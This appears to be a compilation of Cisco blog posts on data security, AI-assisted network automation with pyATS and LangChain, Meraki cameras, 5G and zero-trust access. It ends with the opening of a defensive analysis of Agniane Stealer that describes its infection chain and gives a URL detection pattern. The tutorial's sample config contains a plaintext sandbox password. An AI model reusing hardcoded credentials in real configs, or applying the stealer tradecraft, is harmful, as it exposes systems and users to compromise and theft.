Protect Your Cloud Environments with Data Security Observability

Data is the new fuel for business growth

Data is at the heart of seemingly everything these days, from the smart devices in our homes to the mobile apps we use on the go every day. This wealth of information at our fingertips allows us to correlate data points and determine patterns and outcomes faster than humanly possible — enabling us to predict and quickly thwart adverse events on the horizon. We know that the volume of data collected by organizations is a goldmine of information that, when leveraged correctly, can empower growth. We also know that clean data, free of sensitive information, is critical for fueling GenAI initiatives across the globe. However, this uptick in data creation and usage also amplifies the need for organizations to ensure that they handle data responsibly and adhere to increasingly stringent data regulatory standards.

With astronomical amounts of data constantly being generated, tracked, and stored – it’s become more important than ever to secure it and be able to answer several key questions: Where is my data? Who is accessing my data? And is my data secure?

Introducing Observability for Data Security Posture Management (DSPM)

The new Data Security module announced at Cisco Live 2024 Amsterdam is now generally available. It expands our business risk observability capabilities for cloud environments and delivers automated data discovery and classification in data stores like Snowflake and AWS S3. The new module provides real-time data insights that help visualize, prioritize, and act on security issues before they become revenue-impacting.

A quick look at the new data security capabilities:

◉ Discovery and classification of sensitive data: Easily identify all data stores and data entities, to quickly focus on securing sensitive data.

◉ Data access control: Understand which users, roles, and applications are accessing your data and who have access to personally identifiable information. Seamlessly adopt a least privilege approach by detecting unused privileges and locking down access to your data stores.

◉ Exfiltration attempt detection: Unlock GenAI-based detection and remediation guidance for data exfiltration attempts to stop attackers in their tracks.

◉ Identify security risks: Efficiently detect unencrypted buckets, dormant risky users and siloed unused data entities to reduce your overall security risk posture.

The future of data security

With data being created and moving at the speed of light every day, it can be overwhelming to keep track of exactly where the data is and how it’s being stored – let alone comprehensively securing it. Automation is imperative to keep up, and choosing the right tool will enable you to continue leveraging data and innovating while knowing your data is secure. The Data Security module provides teams with deep visibility and actionable insights to effortlessly protect data at scale. The future of data security relies on our ability to put adequate security controls in place now, so we can embrace the full potential of data and the unlimited capabilities that it unlocks.

Source: cisco.com

Continue reading

Using the Power of Artificial Intelligence to Augment Network Automation

Talking to your Network

Embarking on my journey as a network engineer nearly two decades ago, I was among the early adopters who recognized the transformative potential of network automation. In 2015, after attending Cisco Live in San Diego, I gained a new appreciation of the realm of the possible. Leveraging tools like Ansible and Cisco pyATS, I began to streamline processes and enhance efficiencies within network operations, setting a foundation for what would become a career-long pursuit of innovation. This initial foray into automation was not just about simplifying repetitive tasks; it was about envisioning a future where networks could be more resilient, adaptable, and intelligent. As I navigated through the complexities of network systems, these technologies became indispensable allies, helping me to not only manage but also to anticipate the needs of increasingly sophisticated networks.

In recent years, my exploration has taken a pivotal turn with the advent of generative AI, marking a new chapter in the story of network automation. The integration of artificial intelligence into network operations has opened up unprecedented possibilities, allowing for even greater levels of efficiency, predictive analysis, and decision-making capabilities. This blog, accompanying the CiscoU Tutorial, delves into the cutting-edge intersection of AI and network automation, highlighting my experiences with Docker, LangChain, Streamlit, and, of course, Cisco pyATS. It’s a reflection on how the landscape of network engineering is being reshaped by AI, transforming not just how we manage networks, but how we envision their growth and potential in the digital age. Through this narrative, I aim to share insights and practical knowledge on harnessing the power of AI to augment the capabilities of network automation, offering a glimpse into the future of network operations.

In the spirit of modern software deployment practices, the solution I architected is encapsulated within Docker, a platform that packages an application and all its dependencies in a virtual container that can run on any Linux server. This encapsulation ensures that it works seamlessly in different computing environments. The heart of this dockerized solution lies within three key files: the Dockerfile, the startup script, and the docker-compose.yml.

The Dockerfile serves as the blueprint for building the application’s Docker image. It starts with a base image, ubuntu:latest, ensuring that all the operations have a solid foundation. From there, it outlines a series of commands that prepare the environment:

FROM ubuntu:latest

# Set the noninteractive frontend (useful for automated builds)

ARG DEBIAN_FRONTEND=noninteractive

# A series of RUN commands to install necessary packages

RUN apt-get update && apt-get install -y wget sudo ...

# Python, pip, and essential tools are installed

RUN apt-get install python3 -y && apt-get install python3-pip -y ...

# Specific Python packages are installed, including pyATS[full]

RUN pip install pyats[full]

# Other utilities like dos2unix for script compatibility adjustments

RUN sudo apt-get install dos2unix -y

# Installation of LangChain and related packages

RUN pip install -U langchain-openai langchain-community ...

# Install Streamlit, the web framework

RUN pip install streamlit

Each command is preceded by an echo statement that prints out the action being taken, which is incredibly helpful for debugging and understanding the build process as it happens.

The startup.sh script is a simple yet crucial component that dictates what happens when the Docker container starts:

cd streamlit_langchain_pyats

streamlit run chat_with_routing_table.py

It navigates into the directory containing the Streamlit app and starts the app using streamlit run. This is the command that actually gets our app up and running within the container.

Lastly, the docker-compose.yml file orchestrates the deployment of our Dockerized application. It defines the services, volumes, and networks to run our containerized application:

version: '3'

services:

 streamlit_langchain_pyats:

  image: [Docker Hub image]

  container_name: streamlit_langchain_pyats

  restart: always

  build:

   context: ./

   dockerfile: ./Dockerfile

  ports:

   - "8501:8501"

This docker-compose.yml file makes it incredibly easy to manage the application lifecycle, from starting and stopping to rebuilding the application. It binds the host’s port 8501 to the container’s port 8501, which is the default port for Streamlit applications.

Together, these files create a robust framework that ensures the Streamlit application — enhanced with the AI capabilities of LangChain and the powerful testing features of Cisco pyATS — is containerized, making deployment and scaling consistent and efficient.

The journey into the realm of automated testing begins with the creation of the testbed.yaml file. This YAML file is not just a configuration file; it’s the cornerstone of our automated testing strategy. It contains all the essential information about the devices in our network: hostnames, IP addresses, device types, and credentials. But why is it so crucial? The testbed.yaml file serves as the single source of truth for the pyATS framework to understand the network it will be interacting with. It’s the map that guides the automation tools to the right devices, ensuring that our scripts don’t get lost in the vast sea of the network topology.

Sample testbed.yaml

---

devices:

  cat8000v:

    alias: "Sandbox Router"

    type: "router"

    os: "iosxe"

    platform: Cat8000v

    credentials:

      default:

        username: developer

        password: C1sco12345

    connections:

      cli:

        protocol: ssh

        ip: 10.10.20.48

        port: 22

        arguments:

        connection_timeout: 360

With our testbed defined, we then turn our attention to the _job file. This is the conductor of our automation orchestra, the control file that orchestrates the entire testing process. It loads the testbed and the Python test script into the pyATS framework, setting the stage for the execution of our automated tests. It tells pyATS not only what devices to test but also how to test them, and in what order. This level of control is indispensable for running complex test sequences across a range of network devices.

Sample _job.py pyATS Job

import os

from genie.testbed import load

def main(runtime):

    # ----------------

    # Load the testbed

    # ----------------

    if not runtime.testbed:

        # If no testbed is provided, load the default one.

        # Load default location of Testbed

        testbedfile = os.path.join('testbed.yaml')

        testbed = load(testbedfile)

    else:

        # Use the one provided

        testbed = runtime.testbed

    # Find the location of the script in relation to the job file

    testscript = os.path.join(os.path.dirname(__file__), 'show_ip_route_langchain.py')

    # run script

    runtime.tasks.run(testscript=testscript, testbed=testbed)

Then comes the pièce de résistance, the Python test script — let’s call it capture_routing_table.py. This script embodies the intelligence of our automated testing process. It’s where we’ve distilled our network expertise into a series of commands and parsers that interact with the Cisco IOS XE devices to retrieve the routing table information. But it doesn’t stop there; this script is designed to capture the output and elegantly transform it into a JSON structure. Why JSON, you ask? Because JSON is the lingua franca for data interchange, making the output from our devices readily available for any number of downstream applications or interfaces that might need to consume it. In doing so, we’re not just automating a task; we’re future-proofing it.

Excerpt from the pyATS script

    @aetest.test

    def get_raw_config(self):

        raw_json = self.device.parse("show ip route")

        self.parsed_json = {"info": raw_json}

    @aetest.test

    def create_file(self):

        with open('Show_IP_Route.json', 'w') as f:

            f.write(json.dumps(self.parsed_json, indent=4, sort_keys=True))

By focusing solely on pyATS in this phase, we lay a strong foundation for network automation. The testbed.yaml file ensures that our script knows where to go, the _job file gives it the instructions on what to do, and the capture_routing_table.py script does the heavy lifting, turning raw data into structured knowledge. This approach streamlines our processes, making it possible to conduct comprehensive, repeatable, and reliable network testing at scale.

Enhancing AI Conversational Models with RAG and Network JSON: A Guide

In the ever-evolving field of AI, conversational models have come a long way. From simple rule-based systems to advanced neural networks, these models can now mimic human-like conversations with a remarkable degree of fluency. However, despite the leaps in generative capabilities, AI can sometimes stumble, providing answers that are nonsensical or “hallucinated” — a term used when AI produces information that isn’t grounded in reality. One way to mitigate this is by integrating Retrieval-Augmented Generation (RAG) into the AI pipeline, especially in conjunction with structured data sources like network JSON.

What is Retrieval-Augmented Generation (RAG)?

Retrieval-Augmented Generation is a cutting-edge technique in AI language processing that combines the best of two worlds: the generative power of models like GPT (Generative Pre-trained Transformer) and the precision of retrieval-based systems. Essentially, RAG enhances a language model’s responses by first consulting a database of information. The model retrieves relevant documents or data and then uses this context to inform its generated output.

The RAG Process

The process typically involves several key steps:

• Retrieval: When the model receives a query, it searches through a database to find relevant information.
• Augmentation: The retrieved information is then fed into the generative model as additional context.
• Generation: Armed with this context, the model generates a response that’s not only fluent but also factually grounded in the retrieved data.

The Role of Network JSON in RAG

Network JSON refers to structured data in the JSON (JavaScript Object Notation) format, often used in network communications. Integrating network JSON with RAG serves as a bridge between the generative model and the vast amounts of structured data available on networks. This integration can be critical for several reasons:

• Data-Driven Responses: By pulling in network JSON data, the AI can ground its responses in real, up-to-date information, reducing the risk of “hallucinations.”
• Enhanced Accuracy: Access to a wide array of structured data means the AI’s answers can be more accurate and informative.
• Contextual Relevance: RAG can use network JSON to understand the context better, leading to more relevant and precise answers.

Why Use RAG with Network JSON?

Let’s explore why one might choose to use RAG in tandem with network JSON through a simplified example using Python code:

• Source and Load: The AI model begins by sourcing data, which could be network JSON files containing information from various databases or the internet.
• Transform: The data might undergo a transformation to make it suitable for the AI to process — for example, splitting a large document into manageable chunks.
• Embed: Next, the system converts the transformed data into embeddings, which are numerical representations that encapsulate the semantic meaning of the text.
• Store: These embeddings are then stored in a retrievable format.
• Retrieve: When a new query arrives, the AI uses RAG to retrieve the most relevant embeddings to inform its response, thus ensuring that the answer is grounded in factual data.

By following these steps, the AI model can drastically improve the quality of the output, providing responses that are not only coherent but also factually correct and highly relevant to the user’s query.

class ChatWithRoutingTable:

    def __init__(self):

        self.conversation_history = []

        self.load_text()

        self.split_into_chunks()

        self.store_in_chroma()

        self.setup_conversation_memory()

        self.setup_conversation_retrieval_chain()

    def load_text(self):

        self.loader = JSONLoader(

            file_path='Show_IP_Route.json',

            jq_schema=".info[]",

            text_content=False

        )

        self.pages = self.loader.load_and_split()

    def split_into_chunks(self):

        # Create a text splitter

        self.text_splitter = RecursiveCharacterTextSplitter(

            chunk_size=1000,

            chunk_overlap=100,

            length_function=len,

        )

        self.docs = self.text_splitter.split_documents(self.pages)

    def store_in_chroma(self):

        embeddings = OpenAIEmbeddings()

        self.vectordb = Chroma.from_documents(self.docs, embedding=embeddings)

        self.vectordb.persist()

    def setup_conversation_memory(self):

        self.memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True)

    def setup_conversation_retrieval_chain(self):

        self.qa = ConversationalRetrievalChain.from_llm(llm, self.vectordb.as_retriever(search_kwargs={"k": 10}), memory=self.memory)

    def chat(self, question):

        # Format the user's prompt and add it to the conversation history

        user_prompt = f"User: {question}"

        self.conversation_history.append({"text": user_prompt, "sender": "user"})

        # Format the entire conversation history for context, excluding the current prompt

        conversation_context = self.format_conversation_history(include_current=False)

        # Concatenate the current question with conversation context

        combined_input = f"Context: {conversation_context}\nQuestion: {question}"

        # Generate a response using the ConversationalRetrievalChain

response = self.qa.invoke(combined_input)

        # Extract the answer from the response

answer = response.get('answer', 'No answer found.')

        # Format the AI's response

        ai_response = f"Cisco IOS XE: {answer}"

        self.conversation_history.append({"text": ai_response, "sender": "bot"})

        # Update the Streamlit session state by appending new history with both user prompt and AI response

        st.session_state['conversation_history'] += f"\n{user_prompt}\n{ai_response}"

        # Return the formatted AI response for immediate display

        return ai_response

Conclusion

The integration of RAG with network JSON is a powerful way to supercharge conversational AI. It leads to more accurate, reliable, and contextually aware interactions that users can trust. By leveraging the vast amounts of available structured data, AI models can step beyond the limitations of pure generation and towards a more informed and intelligent conversational experience.

Source: cisco.com

Continue reading

Improved Area Monitoring with New Meraki Smart Cameras

Meraki’s smart cameras offer businesses an easy-to-deploy way to monitor their physical security, with the added benefit of being managed entirely on the cloud. Various Meraki cameras are deployed in the Cisco Store, including the outdoor smart cameras MV63 and MV93, which have long been useful in the Cisco Store. The MV63’s wide-angle, fixed-focused lens monitors the entrances and exits of the store, while the MV93’s 360° fish-eye lens offers panoramic wide area coverage, enhancing surveillance capabilities even in low lighting. Both cameras have helped keep the Cisco Store secure by using important features such as intelligent object detection using machine learning, motion search, and motion recap.

Now, these two cameras have indoor counterparts. Launched in February 2024, the Meraki MV13 and MV33 cameras will continue to improve security measures with even clearer footage, high performance, and stronger analytics. Meraki’s latest camera features, attribute search and presence analytics, will further improve these cameras’ capabilities.

Introducing the newest indoor smart cameras, Meraki MV13 and MV33

The new Meraki MV13 has a fixed lens and is ideal for monitoring indoor hallways and spaces. It is easy to deploy and offers some of the best visual components like 8.4 MP image quality and up to 4K video resolution.

Meraki MV13 smart camera

Meanwhile, the Meraki MV33 has a 360° fish-eye lens and 12.4 MP image quality, and can be used to monitor general indoor retail, hospitality, education, and healthcare spaces.

Meraki MV33 smart camera

Faster search, smarter insights

Meraki simultaneously launched two new features: attribute search and presence analytics.

The attribute search feature is an easier and faster way of parsing through video footage based on a person’s clothing color (both top and bottom) as well as a vehicle’s color and make. In the event there is a suspicious person or theft, this feature would allow security teams to quickly filter through footage by these attributes from up to four cameras, thus improving store security measures.

Meanwhile, the new presence analytics feature includes area occupancy analytics and line-crossing analytics. These will allow security teams to define areas to be analyzed and then accurately gain insights on people movement in those spaces.

Both the MV13 and MV33 will add to Meraki’s broader portfolio of cameras, giving organizations more flexibility and ways to monitor all areas of their buildings with ease, including in the Cisco Store. Attribute search has been incorporated into both the indoor Meraki MV13 and outdoor Meraki MV63, while presence analytics is now available on all second and third generation cameras. By creating tracking areas and easily being able to adjust those lines, security teams can customize what they monitor and then receive analytics that help them identify suspicious activity and gain insights into crowds.

Source: cisco.com

Continue reading

Showcasing Powerful Private 5G Use Cases at Cisco Live EMEA!

For those who joined us at Cisco Live! Amsterdam earlier this month, you might not have noticed that the venue featured a Private 5G Network established in partnership with NTT DATA.

Spanning two halls at RAI Amsterdam, or roughly 26,000 square meters, the seamless integration of this Private 5G network augmented the existing Wi-Fi network, pushing the boundaries of traditional connectivity, and creating a smart venue—a first for Cisco Live!

Built with the support of Intel, the Cisco Country Digital Acceleration team, and RAI Amsterdam—a conference and exhibition space that hosts millions of visitors annually—NTT DATA’s Private 5G network included four radios supporting mission critical and latency-sensitive applications. RAI also had over one hundred Wi-Fi access points supporting the user experience in the same location.

The entire ecosystem performed flawlessly. During busy hours with a full load on the network, Private 5G latency was a speedy 21.9 miliseconds, and Wi-Fi latency was 86 miliseconds. It was incredibly exciting to be part of the future of multi-access connectivity—wired and wireless, Wi-Fi, 4G and 5G, all brought together to enable a seamless digital experience.

The NTT DATA Private 5G-powered communication and streaming services were featured at Cisco Live! Amsterdam as part of the NTT DATA’s Smart Venue Solution, and included the following use cases:

• Mobile broadcasting – wireless video crews roamed the exhibition halls with low latency and high bandwidth, delivering a streamlined multi-camera environment.
• Visitor traffic management – Cisco’s Meraki cameras and NTT DATA’s Smart Management Platform tracked visitor movements and congestion, enabling operations and security teams to communicate real-time, data-driven crowd control decisions.
• Emergency Response Vehicle (ERV) – Pre-packaged, flexible FWA Private 5G connectivity was setup and used to mimic rural cellular/satellite backhaul.
• Premium Booth Connectivity – When the booth is already built and the floor is laid, network cable cannot be raised. P5G provided booth broadband for the exhibitor.
• NTT Coffee Booth – Cisco’s Meraki cameras and the NTT DATA’s Smart Management Platform monitored and managed queues and seating to optimize the on-site experience.
• Enhanced exhibitor experiences – Cisco’s Meraki cameras embedded throughout the venue and in booths captured anonymized data including the number of visitors and time spent in the booth to use for planning and to create better customer experiences.
• Out of Band management – The Private 5G network, backhaul connectivity, and network operations center were integrated to provide the Cisco Live! events team with faster coordination and emergency response capabilities.
• Venue Safety – Machine vision detected whether individuals were wearing Personal Protection Equipment (PPE) through a real-time alert system, helping to ensure safety throughout the convention center’s facilities.

Figure 1. NTT DATA Smart Venue Dashboard

Beyond the experience for event attendees, RAI benefited from the as-a-Service (aaS) model, which made it easy for them to “turn up” and support large amounts of data and real-time insights on the fly, seamlessly augmenting onsite experiences. Turning up 5G capabilities on an ad hoc basis is the ideal solution for conference centers that host large numbers of exhibitors and visitors.

Outfitting RAI with the ability to support advanced connectivity experiences was just the first step, our goal at Cisco is to provide our Service Provider customers with the seamless and flexible technology they need to create business outcomes that deliver on the bottom line.

According to Shahid Ahmed, Group Executive Vice President of New Ventures and Innovation at NTT DATA: “Private 5G and advanced analytics play a pivotal role in accelerating digitial transformation across industries and serve as a driving force to create smarter cities and venues. We are thrilled to partner with Cisco on this unique project. Private 5G excels in a complex environment like this one, and together with our Smart Management Platform will be the catalyst that accelerates the digital transformation journey for RAI and the City of Amsterdam.”

And the next steps at RAI? Cisco and NTT DATA plan to extend 5G coverage following Cisco Live to the venue’s vast 112,000 square meter footprint.

Source: cisco.com

Continue reading

Evolution to 5G-Advanced and Beyond: A Blueprint for Mobile Transport

The rapid rollout of 5G technology has marked a historic milestone in the evolution of mobile connectivity. According to research firm Omdia, 5G subscriptions surged from 1.4 billion in the middle of 2023 to a projected 8 billion by 2028, representing a compound annual growth rate (CAGR) of roughly 40%. Despite this impressive uptake, Omdia’s data also reveals that overall mobile revenue is growing at a modest rate of about 2%, and average revenue per user (ARPU) is experiencing a decline.

Wireless trends and opportunities

Communication service providers (CSPs) are responding by scaling their 5G networks to accommodate the soaring bandwidth demands, foster revenue growth, reduce total cost of ownership (TCO), and enhance network efficiency and agility.

The industry has seen significant investments from CSPs, with tens of billions of dollars spent on 5G spectrum and more on radio access network (RAN) infrastructure to support 5G. CSPs’ current focus is monetizing 5G for both consumer and enterprise services (see Figure 1).

Figure 1. Opportunities and Trends

On the consumer front, fixed wireless access (FWA) has emerged as a leading 5G application. For instance, in 2022, FWA accounted for 90% of net broadband additions in the U.S., surpassing traditional cable and DSL. However, this shift brings its own complexities, including the need for enhanced xHaul transport bandwidth, increased data center resources, and greater demand for spectrum resources.

For businesses, private wireless networks represent a crucial area of growth. These networks are particularly relevant in the manufacturing, transportation, logistics, energy, and mining sectors. The advent of 5G-Advanced technologies could help expand these opportunities further. Network slicing, introduced by the 3rd Generation Partnership Project (3GPP), will be pivotal in deploying private 5G networks and other differentiated services.

Partnerships are becoming increasingly important in network monetization strategies, especially with hyperscalers. Additionally, collaborations with satellite operators are gaining traction due to investment and dramatically reduced launch costs, enabling the deployment of low Earth orbit (LEO) constellations and satellite transition from proprietary silo towards integration with terrestrial and 5G networks. Driven by the need for comprehensive reachability and the development of standardized connectivity, as outlined in 3GPP Release 17, this collaboration allows mobile and fixed operators to expand coverage to remote locations and for satellite operators to tap into new customer bases.

Operators are also focusing on technical advancements to monetize their 5G networks effectively. This includes transitioning from non-standalone (NSA) to standalone (SA) mobile cores, which is essential for enabling advanced 5G capabilities. 5G SA cores are required to launch many capabilities supporting ultra-reliable low latency communications (URLLC), massive machine-type communications (mMTC), and network slicing.

Preparations are underway for 5G-Advanced (3GPP Release 18), with features like non-terrestrial networks (NTN), extended reality (XR), and advanced MIMO. The investment will be fundamental for advancing to 6G.

Another critical development is RAN decomposition and virtualization, which involves breaking down the RAN into individual components and running functions on commercial off-the-shelf hardware. Benefits include better utilization, greater scalability and flexibility, and cost reductions. Implementing decomposition and virtualization using O-RAN promises these benefits while breaking RAN vendor lock-in due to standardized, open interfaces.

Edge infrastructure investment is increasing to support new enterprise applications, integral to 5G SA and 5G-Advanced, by moving processing closer to end users, thereby reducing latency, and serving as a critical driver for cloud-native technology adoption. This approach requires flexible deployment of network functions either on-premises or in the cloud, leading to a decentralization of network traffic that was once concentrated. This evolving trend has become more pronounced with increasing traffic demands, blending network roles and boundaries, and creating a versatile network “edge” within the CSP’s framework.

Operational savings, including cost reduction and sustainability initiatives, are top priorities for CSPs to meet budgetary and carbon footprint goals.

Preparing your mobile transport for 5G Advanced and beyond

Mobile packet transport is critical in these initiatives and network transformation, leading to rapid changes in CSP transport networks. Traditionally, these networks relied on dedicated circuits and data communication appliances. However, modern transport is shifting toward a logical construct using any accessible hardware and connectivity services. Successful network architecture now hinges on the ability to seamlessly integrate a variety of appliances, circuits, and underlying networks into a unified, feature-rich transport network.

The Cisco converged, cloud-ready transport network architecture is a comprehensive solution designed to meet the evolving demands of 5G-Advanced and beyond. The architecture is particularly important for operators to navigate the complexities of 5G deployment, including the need for greater flexibility, scalability, and efficiency. Here’s a detailed look at its essential components:

• Converged infrastructure: Cisco’s approach involves a unified infrastructure seamlessly integrating various network services across wireline and wireless domains. This convergence is essential for supporting diverse customer types and services, from consumer-focused mobile broadband to enterprise-level solutions. The infrastructure is designed to handle all kinds of access technologies on a single network platform, including 4G, 5G, FWA, and the emerging direct satellite-to-device connectivity outlined in 3GPP’s NTN standards.
• Programmable transport and network slicing services: At the heart of Cisco’s architecture are advanced transport technologies like Border Gateway Protocol (BGP)-based VPNs and segment routing (SR), crucial for a unified, packet-switched 5G transport. These technologies enable a flexible services layer and an efficient underlay infrastructure. This layering provides essential network services like quality of service (QoS), fast route convergence, and traffic-engineered forwarding. Network slicing is also a key feature, allowing operators to offer customized, intent-based services to different user segments. This capability is vital for monetizing 5G by enabling diverse and innovative use cases.
• Cloud-ready infrastructure: Recognizing the shift toward cloud-native applications and services, Cisco’s architecture is designed to support a variety of cloud deployments, including public, private, and hybrid models. This flexibility ensures that the transport network can adapt to different cloud environments, whether workloads are on-premises or colocated. Virtual routers in the public cloud play a significant role here, providing required IP networking functions (including BGP-VPN, SR, and QoS).
• Secure and simplified operations model: Security and operational simplicity with service assurance are essential components in Cisco’s architecture. The network is designed for easy programmability and automation, which is essential for operational efficiency and cost reductions. This includes extensive telemetry and open APIs for easy integration with orchestration tools and controllers. Additionally, AI and machine learning technologies can potentially be used for real-time network visibility and actionable insights for optimizing user experience across both wireline and wireless networks.

The architecture is about current 5G capabilities and future readiness. Preparations for 5G-Advanced and the eventual transition to 6G are integral. The architecture’s design ensures operators can evolve their networks without major overhauls, thereby protecting their investment.

Cisco’s converged, cloud-ready transport network architecture offers a blend of technological innovation, operational efficiency, and flexibility, enabling operators to navigate the challenges of 5G deployment while preparing for the subsequent phases of network evolution.

Source: cisco.com

Continue reading

The Real Deal About ZTNA and Zero Trust Access

ZTNA hasn’t delivered on the full promise of zero trust

Zero Trust has been all the rage for several years; it states, “never trust, always verify” and assumes every attempt to access the network or an application could be a threat. For the last several years, zero trust network access (ZTNA) has become the common term to describe this type of approach for securing remote users as they access private applications. While I applaud the progress that has been made, major challenges remain in the way vendors have addressed the problem and organizations have implemented solutions. To start with, the name itself is fundamentally flawed. Zero trust network access is based on the logical security philosophy of least privilege. Thus, the objective is to verify a set of identity, posture, and context related elements and then provide the appropriate access to the specific application or resource required…not network level access.

Most classic ZTNA solutions on the market today can’t gracefully provide this level of granular control across the full spectrum of private applications. As a result, organizations have to maintain multiple remote access solutions and, in most scenarios, they still grant access at a much broader network or network segment level.  I believe it’s time to drop the “network” from ZTNA and focus on the original goal of least-privilege, zero trust access (ZTA).

Classic ZTNA drawbacks

With much in life, things are easier said than done and that concept applies to ZTNA and secure remote access. When I talk to IT executives about their current ZTNA deployments or planned initiatives there are a set of concerns and limitations that come up on a regular basis. As a group, they are looking for a cloud or hybrid solution that provides a better user experience, is easier for the IT team to deploy and maintain, and provides a flexible and granular level of security…but many are falling short.

With that in mind, I pulled together a list of considerations to help people assess where they are and where they want to be in this technology space. If you have deployed some form of ZTNA or are evaluating solutions in this area, ask yourself these questions to see if you can, or will be able to, meet the true promise of a true zero trust remote access environment.

• Is there a method to keep multiple, individual user to app sessions from piggybacking onto one tunnel and thus increasing the potential of a significant security breach?
• Does the reverse proxy utilize next-generation protocols with the ability to support per-connection, per-application, and per-device tunnels to ensure no direct resource access?
• How do you completely obfuscate your internal resources so only those allowed to see them can do so?
• When do posture and authentication checks take place? Only at initial connection or continuously on a per session basis with credentials specific to a particular user without risk of sharing?
• Can you obtain awareness into user activity by fully auditing sessions from the user device to the applications without being hindered by proprietary infrastructure methods?
• If you use Certificate Authorities that issue certs and hardware-bound private keys with multi-year validity, what can be done to shrink this timescale and minimize risk exposure?

While the security and architecture elements mentioned above are important, they don’t represent the complete picture when developing a holistic strategy for remote, private application access. There are many examples of strong security processes that failed because they were too cumbersome for users or a nightmare for the IT team to deploy and maintain. Any viable ZTA solution must streamline the user experience and simplify the configuration and enforcement process for the IT team. Security is ‘Job #1’, but overworked employees with a high volume of complex security tools are more likely to make provisioning and configuration mistakes, get overwhelmed with disconnected alerts, and miss legitimate threats. Remote employees frustrated with slow multi-step access processes will look for short cuts and create additional risk for the organization.

To ensure success, it’s important to assess whether your planned or existing private access process meets the usability, manageability and flexibility requirements listed below.

• The solution has a unified console enabling configuration, visibility and management from one central dashboard.
• Remote and hybrid workers can securely access every type of application, regardless of port or protocol, including those that are session-initiated, peer-to-peer or multichannel in design.
• A single agent enables all private and internet access functions including digital experience monitoring functions.
• The solution eliminates the need for on-premises VPN infrastructure and management while delivering secure access to all private applications.
• The login process is user friendly with a frictionless, transparent method across multiple application types.
• The ability to handle both traditional HTTP2 traffic and newer, faster, and more secure HTTP3 methods with MASQUE and QUIC

Cisco Secure Access: A modern approach to zero trust access

Secure Access is Cisco’s full-function Security Service Edge (SSE) solution and it goes far beyond traditional methods in multiple ways. With respect to resource access, our cloud-delivered platform overcomes the limitations of legacy ZTNA. Secure Access supports every factor listed in the above checklists and much more, to provide a unique level of Zero Trust Access (ZTA). Secure Access makes online activity better for users, easier for IT, and safer for everyone.

Here are just a few examples:

• To protect your hybrid workforce, our ZTA architectural design has what we call ‘proxy connections’ that connect one user to one application: no more. If the user has access to several apps as once, each app connection has its own ‘private tunnel’. The result is true network isolation as they are completely independent. This eliminates resource discovery and potential lateral movement by rogue users.
• We implement per session user ID verification, authentication and rich device compliance posture checks with contextual insights considered.
• Cisco Secure Access delivers a broad set of converged, cloud-based security services. Unlike alternatives, our approach overcomes IT complexity through a unified console with every function, including ZTA, managed from one interface. A single agent simplifies deployment with reduced device overhead. One policy engine further eases implementation as once a policy is written, it can be efficiently used across all appropriate security modules.
• Hybrid workers get a frictionless process: once authenticated, they go straight to any desired application-with just one click. This capability will transparently and automatically connect them with least privileged concepts, preconfigured security policies and adaptable enforcement measures that the administrator controls.
• Connections are quicker and provide high throughput. Highly repetitive authentication steps are significantly reduced.

With this type of comprehensive approach IT and security practitioners can truly modernize their remote access. Security is greatly enhanced, IT operations work is dramatically simplified, and hybrid worker satisfaction and productivity maximized.

Source: cisco.com

Continue reading

Agniane Stealer: Information stealer targeting cryptocurrency users

The Agniane Stealer is an information-stealing malware mainly targeting the cryptocurrency wallets of its victims. It gained popularity on the internet starting in August 2023. Recently, we have observed a distinct campaign spreading it across our telemetry. Our recent study has led to the successful identification and detailed analysis of a previously unrecognized network URL pattern. Our researchers have recently uncovered more information on the malware’s methods for file collection and the intricacies of its command and control (C2) protocol. We also have new reverse engineering insights into the malware’s architecture and communication.

We believe our work contributes to tactical and operational levels of intelligence regarding Agniane Stealer. It can prove useful from incident response to detector development and would be more suitable for a technical audience.

The Agniane Stealer has already been referenced in several articles. The Agniane stealer malware is being actively marketed and sold through a Telegram channel, accessible at t[.]me/agniane. Potential buyers can make purchases directly via this channel by interacting with a specialized bot, named @agnianebot, which facilitates the transaction process and provides additional information about the malware.” Our technical analysis indicates that it utilizes the ConfuserEx Protector and aims at identical targets. However, it employs a distinct C2 method, based on the sample observed in our telemetry data. Therefore, we have decided to publish a technical analysis of the sample.

Introduction

During our threat-hunting exercises in November 2023, we have noticed a pattern of renamed PowerShell binaries, called passbook.bat.exe. On closer inspection of the host machines, we have identified infections of the newly discovered malware family of Agniane Stealer. Threat research Gameel Ali (@MalGamy12) first disclosed the existence of this malware on their X account. Researchers from the Zscaler ThreatLabz Team and Pulsedive Threat Researchers eventually followed up with blog posts of their own. Our work aims to contribute additional information understanding campaigns involving the use of Agniane Stealer.

Execution Chain

Execution chain.

The infections we detected seem to start with the downloading of ZIP files from compromised websites. All the websites from where we have seen the download of this file in our telemetry are normal websites with legitimate content. All download URLs had the below URL pattern:

http[s]://<domain name>\/book_[A-Z0-9]+-\d+\.zip

Once downloaded and extracted, the downloaded ZIP file drops a BAT file (passbook.bat) and additional ZIP file on the file system. The BAT file contains an obfuscated payload and after its execution through cmd.exe, it drops an executable which is renamed version of PowerShell binary (passbook.bat.exe).

This enamed PowerShell was used to execute series of obfuscated commands.

